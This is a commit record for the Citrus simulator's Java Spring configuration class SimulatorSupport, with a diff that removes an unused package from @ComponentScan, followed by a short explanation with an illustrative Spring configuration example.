org.springframework.core.io.ClassPathResource; import java.io.IOException; import java.io.InputStream; import java.util.Properties; /** * @author Christoph Deppisch */ @Configuration @ComponentScan(basePackages = { "com.consol.citrus.simulator.config", "com.consol.citrus.simulator.listener", "com.consol.citrus.simulator.service", "com.consol.citrus.simulator.endpoint", "com.consol.citrus.simulator.web", "com.consol.citrus.simulator.controller", }, nameGenerator = ScenarioBeanNameGenerator.class) @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) @ImportResource( locations = { "classpath*:citrus-simulator-context.xml", "classpath*:META-INF/citrus-simulator-context.xml" }) @PropertySource( value = { "citrus-simulator.properties", "META-INF/citrus-simulator.properties" }, ignoreResourceNotFound = true) @EnableConfigurationProperties(SimulatorConfigurationProperties.class) public class SimulatorSupport { /** Logger */ private static Logger log = LoggerFactory.getLogger(SimulatorSupport.class); /** Application version */ private static String version; /* Load application version */ static { try (final InputStream in = new ClassPathResource("META-INF/app.version").getInputStream()) { Properties versionProperties = new Properties(); versionProperties.load(in); version = versionProperties.get("app.version").toString(); } catch (IOException e) { log.warn("Unable to read application version information", e); version = ""; } } }
removed unused package from component scan
simulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java
removed unused package from component scan
<ide><path>simulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java <ide> @Configuration <ide> @ComponentScan(basePackages = { <ide> "com.consol.citrus.simulator.config", <add> "com.consol.citrus.simulator.controller", <add> "com.consol.citrus.simulator.endpoint", <ide> "com.consol.citrus.simulator.listener", <ide> "com.consol.citrus.simulator.service", <del> "com.consol.citrus.simulator.endpoint", <del> "com.consol.citrus.simulator.web", <del> "com.consol.citrus.simulator.controller", <ide> }, nameGenerator = ScenarioBeanNameGenerator.class) <ide> @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) <ide> @ImportResource(
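The change in this record is purely to the @ComponentScan configuration: the unused "com.consol.citrus.simulator.web" package is dropped and the remaining base packages are listed in a tidy order, so Spring no longer scans a package that contributes no beans. A minimal, hypothetical Spring configuration class showing the same pattern follows; the package names and class name are invented for illustration.

import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;

@Configuration
@ComponentScan(basePackages = {
        // List only packages that actually contain Spring-managed beans;
        // scanning unused packages slows startup and obscures intent.
        "com.example.app.config",
        "com.example.app.service"
})
public class AppConfig {

    public static void main(String[] args) {
        // Bootstrapping an annotation-based context picks up beans from the
        // scanned packages declared above.
        try (AnnotationConfigApplicationContext ctx =
                     new AnnotationConfigApplicationContext(AppConfig.class)) {
            System.out.println("Beans registered: " + ctx.getBeanDefinitionCount());
        }
    }
}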